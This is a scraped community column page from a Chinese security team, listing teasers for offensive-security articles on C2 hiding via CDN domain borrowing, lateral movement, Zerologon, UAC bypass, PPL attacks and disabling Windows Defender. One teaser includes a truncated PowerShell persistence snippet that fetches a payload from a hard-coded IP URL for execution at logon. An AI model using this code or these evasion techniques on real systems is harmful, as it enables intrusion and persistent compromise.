黑白天安全团队

从部署到实践，即刻拥有你的专属龙虾助手

OpenClaw开发者专区🦞🦞🦞

自行/邀约他人一键搬运博客，享价值百万资源包

腾讯云自媒体同步曝光计划

往期视频·干货材料·成员作品 最新动态

腾讯技术创作特训营知识专栏

新邀入驻腾讯云开发者社区，福利多多！

Domain Borrowing是腾讯安全玄武实验室的安全研究员 Tianze Ding 和 Junyu Zhou 在Black Hat Asia 2021演讲中分享介绍的一种使用 CDN 隐藏 C2 流量以规避审查的新方法。借用在某些 CDN 实现中发现的一些技巧，将它们链接在一起以“借用”域及其有效的 HTTPS 证书来隐藏我们的 C2 流量，特别是当我们的 C2 流量的 SNI 和 HOST 相同时。

利用Domain Borrowing对抗流量检测设备

wmi是基于135端口进行的横向。依赖445只是因为，需要使用445取回命令执行结果。sharpwmi进行横向的时候火绒日志有一个特别有趣的地方：

绕过杀软进行横向移动

任务计划程序服务（Task Scheduler service）是Windows操作系统中的一个核心服务，它负责管理和执行计划任务。任务计划程序服务（Task Scheduler service）在后台运行，并由 svchost.exe 进程来托管。任务计划程序服务允许用户创建、编辑和删除计划任务。用户可以通过图形用户界面（Task Scheduler GUI）、命令行工具（如schtasks）或编程接口来管理计划任务，用于在预定的时间或特定事件发生时自动执行一系列任务。

终端安全系列-计划任务详解

随着Web应用攻击手段变得复杂，基于请求特征的防护手段，已经不能满足企业安全防护需求。在2012年的时候，Gartner引入了“Runtime application self-protection”一词，简称为RASP，属于一种新型应用安全保护技术，它将防护功能“ 注入”到应用程序中，与应用程序融为一体，使应用程序具备自我防护能力，当应用程序遭受到实际攻击伤害时，能实时检测和阻断安全攻击，而不需要进行人工干预。

RASP的安全攻防研究实践

本文是域提权漏洞系列分析中的Zerologon漏洞分析部分-其他部分还有几年的域提权漏洞和域提权手法

域提权漏洞系列分析-Zerologon漏洞分析

WSUS 是一种 Microsoft 解决方案，使管理员可以以扩展的方式在整个环境中部署 Microsoft 产品更新和补丁，使用内部服务器而不需要直接连接到Internet。WSUS服务在 Windows 企业环境中极为常见。

使用SharpWSUS通过WSUS横向移动

Kaspersky AVP.exe 中的 DLL 注入允许本地管理员在不知道 Kaspersky 密码的情况下杀死或篡改防病毒软件和在高权限中执行命令。

Kaspersky AVP.exe DLL 劫持

“WMI是微软为基于Web的企业管理（WBEM）规范提供的一个实现版本，而WBEM则是一项行业计划，旨在开发用于访问企业环境中管理信息的标准技术。WMI使用公共信息模型（CIM）行业标准来表示系统、应用程序、网络、设备和其他托管组件。”

WMI持久性后门(powershell）(水文)

即不落地PE⽂件。落地的是⼀个经过aes加密（可以通过修改源代 码⾃定义aeskey，否则使⽤默认的aeskey）的数据⽂件。 

beacon_frp

经过身份验证的用户可以操纵他们拥有或管理的计算机帐户的属性，并从 Active Directory 证书服务获取允许提升权限的证书。

Active Directory 域服务特权提升漏洞 CVE-2022–26923

        首先，PPL表示Protected Process Light，但在此之前，只有Protected Processes。受保护进程的概念是随Windows Vista / Server 2008引入的，其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并遵守DRM（数字版权管理）要求。Microsoft 开发了这种机制，以便您的媒体播放器可以读取例如蓝光，同时防止您复制其内容。当时的要求是镜像文件（即可执行文件）必须使用特殊的 Windows Media 证书进行数字签名（如Windows Internals的“受保护的进程”部分中所述

Protected Process Light (PPL) Attack

Certified Pre-Owned是安全研究员@（Will Schroeder和Lee Christensen）在6月17号提出的针对Active Directory 证书服务的一个攻击手法，并于8月5日在Black Hat 2021中进行展示。

Certified Pre-Owned

AppInfo是一个本地RPC服务，其接口ID为201ef99a-7fa0-444c-9399-19ba84f12a1a，AppInfo 是 UAC 提升的关键。ShellExecuteEx()通过 RPC 调用将所有提升请求转发到 AppInfo NT 服务。AppInfo 在系统上下文中调用一个名为“approve.exe”的可执行文件，这是启动用户同意的对话框的可执行文件.

利用本地RPC接口的UAC Bypass

2022-01-25，CVE-2021-4034 Exploit 详情发布，此漏洞是由Qualys研究团队在polkit的pkexec中发现的一个内存损坏漏洞

CVE-2021-4034 Linux Polkit 权限提升漏洞分析

本文以Tomcat 9为核心学习并归纳了一些内存马技术，除有特殊说明外的章节外，本文使用Java 8u292

JavaWeb 内存马技术归纳

self.data = wildcard.deal_wildcard(self.data)

从工具OneForAll代码角度学习子域名挖掘

产品名称: Microsoft® Windows® Operating System

colorcpl.exe

#>
#使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payload
function Add-Persistence()
{
#payload的路径
$payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2"
  
#保存维权马的路径
$tmpdir = $env:APPDATA;
  
#vbs路径
$payloadvbsloaderpath = "$tmpdir\_log.vbs"
  
#下载payloa

分享一个维权手法

2 .WriteProcessMemory -> 将解密/解码的shellcode写入内存空间

Alternative Process Injection

可以关闭Windows Defender服务并通过提升权限删除ppl保护，然后删除Windows Defender中的DLL和其他文件，使Windows Defender服务无法运行，从而导致Windows Defender拒绝服务。

绕过ppl保护关闭Windows Defender

文章

问答

视频

教程

学习中心

腾讯云实验室

直播

竞赛

腾讯云代码分析专区

腾讯iOA零信任安全管理系统专区

腾讯云架构师技术同盟交流圈

腾讯云数据库专区

腾讯云智能顾问专区

腾讯云原生专区

腾讯混元专区

腾讯云TCE专区

腾讯云Lighthouse专区

腾讯云HAI专区

腾讯云Edgeone专区

腾讯云存储专区

腾讯云智能专区

腾讯轻联专区 

腾讯云开发专区

TAPD专区

腾讯轻量云游戏服专区

腾讯云最具价值专家

腾讯云架构师技术同盟

腾讯云创作之星

腾讯云开发者先锋

腾讯云代码助手

云原生构建

TAPD 敏捷项目管理

Cloud Studio

SDK中心

API中心

命令行工具

涵盖代码开发、场景应用、自动测试全流程，助你从零构建专属AI助手

一站式MCP教程库，解锁AI应用新玩法

聚焦“写作效率、视觉美观与运行性能”三方面进行全面升级，为您提供更高效、稳定的创作环境

社区富文本&Markdown编辑器全新改版上线，欢迎大家体验!

诚挚邀请您参与本次调研，分享您的真实使用感受与建议。您的反馈至关重要，感谢您的支持与参与！

社区新版编辑器体验调研

腾讯云开发者社区推出了黑白天安全团队专栏，为你提供了黑白天安全团队的相关文章，致力于帮助开发者快速成长与发展。

黑白天安全团队

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐